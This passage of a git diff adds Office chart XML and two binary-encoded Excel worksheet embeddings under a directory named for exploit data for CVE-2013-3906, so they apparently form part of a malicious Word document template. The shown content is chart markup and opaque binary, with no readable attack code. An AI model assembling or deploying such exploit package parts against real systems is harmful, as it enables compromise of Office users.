+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:bandFmts/>
+<c:axId val="59304576"/>
+<c:axId val="68746240"/>
+<c:axId val="59572224"/>
+</c:surface3DChart>
+<c:catAx>
+<c:axId val="59304576"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="68746240"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="68746240"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="59304576"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="midCat"/>
+</c:valAx>
+<c:serAx>
+<c:axId val="59572224"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="68746240"/>
+<c:crosses val="autoZero"/>
+</c:serAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+<c:txPr>
+<a:bodyPr/>
+<a:lstStyle/>
+<a:p>
+<a:pPr rtl="0">
+<a:defRPr/>
+</a:pPr>
+<a:endParaRPr lang="en-US"/>
+</a:p>
+</c:txPr>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx
new file mode 100755
index 0000000000000000000000000000000000000000..73575cba2494cbb06fbc4beac877753ef8dc5ff3
GIT binary patch
literal 8544
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
Q06>HOaG{t5l7D~uABL5ing9R*

literal 0
HcmV?d00001

diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx
new file mode 100755
index 0000000000000000000000000000000000000000..9ff454e76f453975a16b8144e331cf295ce324cc
GIT binary patch
literal 8543
zcmeHMg;!MD+nyn%TRNnryQD#+LqJK%p}VD|LAtvog#n}`q`OmKB&0hO>G(#yzw5nt
zzwZzDefP{-=d82#yw6#C@8^yEyvlO0aJT>jz&!u}@Bna#?TKg$1OPDM0RSApC!n^3
zt&J1N#z{}@r5(som&MK6iXwLgNS_UWf&TyB>%VLTO4SAwJJ>LrsE#mV%IWO~fDb0C
z5y_quNuC3YY>7)EtzXvVUwiN%fdL8GZ<{+qOEU;Z!i7?;ERw(va?n2Db{JA{910NZ
z;OD!g39Z#pN<3Yl#}|w@M4_i$83-G*A_j71o@j)I(l5xoZt&AGz@l_pNC{SBTwbh>
zR@ute@@XPNwaG)zY*kf63nGYmp&?p{P+2T{Txzi%LrnL2Ec+52r5k6~i+9E@NxW;b
z^jT;B+FY7m>C5C1Fapl;Ta&U}_(lum)vN$%ZA3Q?yl%LDeR$CtMuE{+$uiBHRaQw8
zBNwWoC=DyGeBNvE_mlCai{iV(1ovoO;+eF?fv+`YLxfPTXTO<#!5aS}6tMPQ)qMP+
z1?XDwGzZ(kqu`-r{HK~Ycu}MGz_=$t0h0GmGD(-$QAX37!C3t+{H~lQXI^9#=%s2f
zUu9qG1y<=r9n5$MoM>)FFP*WuWLOtqP*Xrot*(#&fZJPGfb!pbuST7X>Kl|$@=(`8
z0Sp8696(l%tSsN}6uJHX`rLnwuZ72sK)npL`#`!$V)b&{M*3b(extl};{!FaR_cB7
znus^lqNgVTuzs>ekg=1E5fSZ${dIFSauP#U#f}Dgv3Hz?9v>~-z*)~QvJELs&2f8(
zB1sIM&o5Z%x#h*D8GgJhstgMwYKXt0GUOsv!bLgSb;yrlQ|UJ_8;c_>0)2{K6AEe}
zQ)U*NYO}b9=z;iF_(Jf!vW`o^){S-D%P>hXTr?Bs(SXaEgb7OV2&5=gd_cw@?`!%5
zR^KJ15o{*yoQ~4*Z7rWYrQGXL>7}oNi=mF9J3GECS!Ts&&BKDrg#n)xjL!_(x-iuA
zpxgF4*L{WKla8Sy4N$HV0qz0atXO~2-PP8?($Ln{@_VNFgZgmasSnLb|G%%&*b&)I
zHq7n=zXQy5n~5??%C!B*0nHX(KGE`NmDboCD_I|!b8;bppyp%jGn3xaYmSt?eM^!~
zMA~it=gN3A_l{|27F>}RQa92NF+1n9h2Wx)X{l$XK0b%wlW=XwtzJk|Ho84sN?v&r
zZ%h)I8j3l#p-4Pl#6K|ES2QH%O3w>=$vQC(yN#ptt`2#8VZqO=AUW>#6x|v^?1{YY
zB{^bBNqxk%iWnkQh_2Zd#lk_=`}HV|dxbv=K5DBf{;Q_0VbQel8S0iOdQ23_E1Fox
z4a&j!RJK(o@yq^)<&ZDhiEE2}y>SsGEzsTmoipiA4{p_<BlJ+tU_i+L<;-8%5+0+c
z)IovUwWx4~9^m@q`A26KOZ*6;Q$u;4dCo*gLby2Wq>Z;btMzskZx&1Nz;zpc>2#r1
z3`T__QO4L7buOHfLBM2i_=kP6^84|8BQ;C?X1$w)B)S_(_$9+LD~;?=`~Z6#S}zxw
z2pu28bGzb9_;f3pTMY@xdgzzEYYi*`c!D)Z9y>mBEZ!2;n7d_@*X)PcR~Vblz6QL@
zuJ74sl;w$BFL}z~MofaWz%|m;?V5#46Z+_uA`dZUj8Jx>Eej38;|f;GNt1jCI<M=)
zmxGIMQuhu%krG(P8(DTEQw*YCpmy3frI&V?lVg?-?uD1~Ae-V2Ej!rFKU9}m;cAxY
zZl;S4?nm^jl!nQ;Za)Psb9>P=xYnWNC>|Ax&u0U5Ao-nv^C9L+1U<-Q$kjNquh<mF
z>svbLXZn>W?)Qf;pi8XKZTz#-Uctn$oIw}91G)*gKR3Y9%)kL;tm@=oZe!~B-DjOt
z<P<wZQRk`b5iO^qWl+ScWedV&b$lEEjP`U?G@NZN$ZN;)f%KH>Ne3&Y=kMn{(S=At
zX!11D9;*;#&*bq)>ZR4q4_sFPRl=E19zL~>q&8Wxv1Pyt6eP~)$=I&1eU=)D5KkF_
zTUDtfm~GO#(BB&Xc9Il0cF{~!a%sgx<1!D`N=xv47<Br&wq-^gTPJ@%fiJo>w{n}o
zWBKN2fbps$eK9vy$+JmbfDvEQbj^Kk#cHHDwkCXL_3f7-aZidB{dI>%I89VNIECQS
z(OgP4DJ9oY4)@IoM0UHwjP*!9ljswX$Ys{Sb-H?6=sNsP)uQxofF|e&4Rocbey-Ga
zsydp1Ku(T-M7kd@?0?3&fT%X)b~a4O1HW6$6Ps~&%$S1akkOJ&#L}%=v|5>7sj(K`
zrN?52T)XI(CWRJcU#a(TXWa{P;^FT(bh}QY5e*l1SfKdfG@#QRNO!~$q`JQ^isUlr
ze<C>7N~ua>NuY}SD1RoLi%O2X7gTs^-yPq>SLCxE3R~=~Vx@LvEPCCAYhC!DRu^gc
z7?uBA1ajKUU46RF6DKD^sn$LqNf=_EohR0R8npPd|B9)o;i=x*HvT_Oeyf0{-VXr)
zP$m9;hWO#9PG%r$5bKZoj~VZ3D%nDKa9c2DTq&Gvt?6os5uHP4-lc&Rh&ye9$;?v{
zHB@s&$7Q^T=T>}x9SsIaz{Wi`E5=cnMyD)V?O-tM1>T9YY$d^f+&BX9^i;4U<txwI
z#T6>&Z*%@3ITDoAYxa;5-7@!(PGRy1J~I#3pldl|vRLFEqd_<MxrKD;gSqL;1KqAP
z25Ky^3gN`G`n^C|nzV$_V*`SL0l^3Cg9`N_6@JgL)Vg8Ff%75i({HCtXxh0>l*6eg
zJUlpZgvBHj#v%P7rvy#ivfIF{*S@q0>39f_GN-x3he1h5P9d5QSYab?E^3VUV1h(s
z+PN1~S55uXQ^*VQ`0O=?)&{zZSL4oGen(D2hq!I@rdm56wV%5<Tp+Yga+H1CarUT5
z&jji(A}WBH9;bf0kpjn!G5PGSaO~OCsDK;KV6MN>q-bX-7LLh+-bteM3Qs2;5>J_U
zc?`7?M|bfi9)25kse?EjA{ZYH(Rkj<mT0;jA>eWlDJ6~0<y?Eq3I)saL6`$=0iJJC
z+wti`f&?45!jPh--fDy$da+ypMn!}0B4SeMjQzYqmRTaD{0xTxw%9t!?<79x5RErQ
zAHyrCK`z<aqOnli%QIiyZl9|jZ=c7l1dl|L-#A@ujvaN7Gc%ihW{LD)ZckeDKH2z4
z{zfFz`|Fn@{53bt&fAL)x|XY}m;9I<W)H@~ShKE9cKgE0g|Dw0duR@=eV;r&i<Xki
z)n2_vdU(%?GsvEXj>`T6UI(VCDLlHb3({65GU*bS-vm^TZXe<LT=a+@_C?mbt1)SS
zVSyRa2C=~^;FQmlltmWJPU0(rh8tg)zr(uWvrbZdPmS)zFr%KDW=$A%P88Xmllf>q
z!+lN?Mv~}c`n-*^_-O3CeU<GQ=co%mIboGevd5(Iata)IRCLkz!(7bayi=04P|IAb
zs$B7%`4}hMgGm~srSA>O29RT~Cm#u9J|szqAz2Q=L-WQdsgUn&(>Z&rqr`CNBuen4
znLVb`YRDRRaX;M~R-&1~`I0Q{3CmM@0p>R^aU5Sr?jM@-cB(uLA|2&pG8Bncy{8g>
z@}9x}z@As)_|X}#hjHF33A<;$5Z~_+mz|^*Tu5dL(w-dsq~dji*_CTovPw}m55fZ8
zN^KpQwyLJ=ZYF(OiQR2md!xVUk+83Z-h$i0)V!<nM~|JI{kJ;8mNmM#8b!?wFDty>
zZN<JxQ1}wS!K3UbWg|O5CpW{??L{!TGYE`X4KAP#=&7!MR4=Mug@9BhoXbEGz~@WW
zxNc7AD=&kHO{3F3JB*q%KJB(Sksw6KbDYvP4f}eEj2!aWSty+p&4I&Y0BP`?)2O-(
zDLrBKA|al>=vrXVLaT_=v4n6;zSyyTjlmxyN!`EgQ|f3S#inj+zXD&b<+L47TX=ZQ
z{2oI3`!2W7l)BUsg0#g^)e8f{Zwcu@?+jUBDO_Yd^G044YJgk8`F$UNbya-Dy=5Q#
zbl01CkDlIdLt))&5{ijrVxgrA8&iQ;a!(VHeX$=up|vXw?4bvi%gvt|+;5$aE)PJv
zRE?W8K5tJ0%d_($S=gx>?0v|qP({RkFom9&gNDYL5CjP0renO-f*o{ML7tI*h4yfo
zmxADi`(bNjnPs1`xTm_4i-9C$_(MT{{0J_Vzny1*loc&HTfJT|!zO0|whf*9<55<-
zgaWX2!KdYPTHPa<fu&tO6Pb_+hZ0q;0b>;2m+1rg3&_j9Hu;srYs2NCGUq5y^9j0d
zIn|H7VLrm|80`VcZ5-gG1oR+e_zbJcfw9pSUcd<dVp2?IJ5rPhOf|bKs~Z%DqFYFM
z6_>nLN3jy=C;$ohG6os`!KHGd{BeeOY2v<aBDEY+N(e&;BM#$92njaNBzHyesS8FR
z=5|499;kImu{-NB(`1x>R6&t_F`X#(pqU5pW^1^ImXm&M+F)YT_+;cU)2#ZQdzB!>
zBP?|D_2V@4kxH0kyjs6!sVC(R+xhFXwBIFiy|6TH_r*`*4r*(9AiFe<xFu3?tMZxi
z(q7!QNWvRXgV$Dvpn%$rkb4npEf~!b?P3QP5l33xmM5b*Q2>ss)vDFhvnx#dDr8{A
zJga%-rD(J<lrk{f*A>R)VqwrT?P8T*+*U=WiW@{bE7r}|?K#EZ?Y8{pa%q#aemRSs
zMuDx(l*Tvb8%eUD&uSgX&^Wl|A5+%n`^6mB&|F;&2LPb`Oj(XjFReg7N}4=1-I7T*
zOfUQ^j0Xn`R`^Xt)y>(J6h-%3S<g~=%!zxS$P`%al)J`yTb=gd>CL5V4fYMD#H}m6
z8C#|FQXam~<-w;+X}uRvX)UHVT*!MskJJiYn$y%Al|i^r`{12`m|X3-p9klM$%9)B
zyD7qUe_N4=j7*1>+1oswmt^!CGfH!kPJo6n*CR6Ys6jiBc?$2aI7JOHlRmy&_F#vt
z!)GEYLJ;W1qdh@jK#$bZP6w)ua3!6R{*vTryEn&N!BOnd0$N|fD~Ee1!k(~{`#hH2
z0s9(R0boH3j)1K_B+|;6jpCja=1TUCyrvf8x=f|nqrEbpeAs~|hZhu=mtz~sDVDPU
zo^5qV7jHdTRsyUY0$PsS4%0`o${Is<yL2s!YZBh$s`qVV#D<8D9EXo_aa~DeG!#gT
z*-e{fU!QqY6M7&L_g%PZaPSb{yi&tiICZ~Bme%2lY3RCfq5h;?fhLjbj(j16tTq9D
z@Dxqfzf#-d;}Mo>cwInl3rkEX<I63ax{}M;>-G|7(bQ$BBc9J%$jG|bH>KvFKoXiV
